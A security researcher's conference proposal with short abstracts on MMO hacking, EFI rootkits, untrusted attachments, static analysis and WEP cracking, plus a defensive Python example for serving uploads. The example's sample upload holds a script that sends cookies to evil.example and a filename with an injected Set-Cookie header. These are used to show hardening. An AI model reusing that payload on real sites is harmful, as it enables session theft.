Things I want to talk about (details below):
* MMO Hacking
* EFI Rootkits, SMM, and Disk Encryption
* Serving Untrusted Attachments = Doom
* Free Static Analysis: Dehydra vs. Clang vs. Elsa
* Auto-WEP key cracking with ITX
I want to strip out all the usual introduction and fluff and do about 5 turbo talks. Or one of these could be done as a separate turbo talk.
MMO Hacking
Things I've learned about hacking Massively Multiplayer Online games in my time as the director of security for MMO company Gazillion Entertainment. Useful tools and resources for game reversing and methods of preventing hacking (tips for attack AND defense).
EFI Rootkits, SMM and Disk Encryption
In the next year, every major chip manufacturer will ship boards that use EFI. This brings new life to the old idea of PCI Option ROM rootkits, which can now easily access libraries that provide filesystem access as well as a full network stack. What features of EFI make this easy? What are the constraints on an EFI rootkit? How could this be mitigated as an attack vector?
Loic's recent talk at CanSecWest described a method of bypassing the D_LOCK bit, allowing access to SMM even after it has been locked. The basic approach, getting different chips on the motherboard out of sync, is effective for all kinds of attacks against hardware (such as full-disk encryption). Can full-disk encryption ever be successfully implemented? Is there even a point to using a TPM? Aren't AMT and ASF a _REALLY_BAD_IDEA_?
The Trouble With Attachments: Serving Untrusted Files = Doom
Since the provided user controls handle input encoding, injections are scarcer but still available. One less conventional method I found relies on a bug in Internet Explorer. On a web application that allows file uploads (attachments, for example), you can upload an HTML file containing the injection script.
When this attachment is viewed in Firefox, it behaves correctly: the file is downloaded first and then viewed in a local-file script context. In IE, however, the downloaded HTML file is viewed with the script context of the site from which it was downloaded! This bug shows up in a lot of places, and there is no good fix. Demonstrations ;)
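To make the exposure concrete, here is an added example in Python (written for this page, not code from the talk or from Gazillion) of an upload-serving handler done two ways: the risky way the abstract describes, echoing the uploader's claimed Content-Type inline from the application's own origin, and the defensive way a practitioner would serve attachments, forcing a download with a sanitized filename, refusing MIME sniffing, and pushing downloads to a separate cookie-less origin so that a browser which renders the file anyway does so outside the application's session. The hostnames, the sample upload and the helper names are assumptions made for the example.

```python
"""Added example (not from the talk): serving uploaded files defensively.

unsafe_response() reproduces the situation the abstract describes: the
uploader's claimed type is trusted and the file is served inline from the
application origin. hardened_response() forces a download, blocks sniffing
and moves the file to a separate sandbox origin. Hostnames and the sample
upload are constructed for this example.
"""
import re
import unicodedata

APP_ORIGIN = "https://app.example"                # assumed application host
SANDBOX_ORIGIN = "https://files-sandbox.example"  # assumed cookie-less download host

# Constructed "attachment": valid HTML carrying script, with a filename that
# also tries to inject a header through the Content-Disposition value.
MALICIOUS_UPLOAD = {
    "filename": 'invoice"; \r\nSet-Cookie: pwned=1; .html',
    "claimed_type": "text/html",
    "body": b"<html><script>document.location='https://evil.example/?c='+document.cookie</script></html>",
}


def safe_download_name(name: str, fallback: str = "download") -> str:
    """Reduce a user-supplied filename to something safe inside a quoted header value."""
    name = unicodedata.normalize("NFKC", name)
    name = name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)        # removes CR/LF, quotes, spaces, ...
    name = name.strip("._") or fallback                 # no empty or dot-only names
    return name[:128]


def unsafe_response(upload):
    """The behaviour the abstract warns about: inline, attacker-chosen type, app origin."""
    return {
        "origin": APP_ORIGIN,
        "status": 200,
        "headers": {
            "Content-Type": upload["claimed_type"],
            "Content-Disposition": f'inline; filename="{upload["filename"]}"',
        },
        "body": upload["body"],
    }


def hardened_response(upload):
    """Force a download, refuse sniffing, and serve from an origin that holds no app session."""
    fname = safe_download_name(upload["filename"])
    return {
        "origin": SANDBOX_ORIGIN,
        "status": 200,
        "headers": {
            # Never let the uploader pick a renderable type.
            "Content-Type": "application/octet-stream",
            "Content-Disposition": f'attachment; filename="{fname}"',
            "X-Content-Type-Options": "nosniff",
            # If something renders it anyway: unique origin, no script, no loads.
            "Content-Security-Policy": "sandbox; default-src 'none'",
            "Cache-Control": "no-store",
        },
        "body": upload["body"],
    }


def rendered_in_app_origin(resp) -> bool:
    """True if a browser honouring these headers would run the file's script
    as the application's origin: renderable HTML, served inline, app host."""
    h = resp["headers"]
    ctype = h.get("Content-Type", "").split(";")[0].strip().lower()
    disposition = h.get("Content-Disposition", "inline").split(";")[0].strip().lower()
    return ctype == "text/html" and disposition != "attachment" and resp["origin"] == APP_ORIGIN


if __name__ == "__main__":
    for label, build in (("unsafe", unsafe_response), ("hardened", hardened_response)):
        r = build(MALICIOUS_UPLOAD)
        print(label, r["origin"], r["headers"],
              "-> script runs in app origin:", rendered_in_app_origin(r))
```

The headers only help in browsers that honour them, which is exactly what the IE behaviour above undermines; the separate download origin is the control that still holds when the browser renders the file regardless, because the rendered page then has no access to the application's cookies or DOM. The filename sanitizer matters independently: an unescaped quote or CR/LF in a Content-Disposition value is a header-injection bug of its own.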
Free Static Analysis: Dehydra vs. Clang vs. Elsa
A new patch for GCC from Mozilla, Dehydra, allows the scripting of custom static analysis rules in JavaScript via the SpiderMonkey engine. How does this make your life easier on the first two days of a code audit? Interesting semantic searches to perform on C++ code bases, and the advantages and limitations of this approach. I will also compare it against the other two alternatives, Clang and Elsa.
Auto-WEP key cracking with ITX
This has become so trivial that people are playing for time, with average scores under 3 minutes. Tips and tricks for working around the idiosyncrasies of airtools in an embedded environment. The toolset has been ported to the Eee PC, and I can demo a Fonera-based unit the size of a deck of cards.
Ben Kurtz
Ben Kurtz is the Director of Security for Gazillion Entertainment, an MMO company. Prior to that, he spent some time in the trenches as a security consultant in Seattle. In previous incarnations, he worked on avionics, power plants, visualizations, automated network death machines, and once knitted a quite nice scarf.
Ben spoke at Defcons 13 and 15, CCCamp07, and 25c3.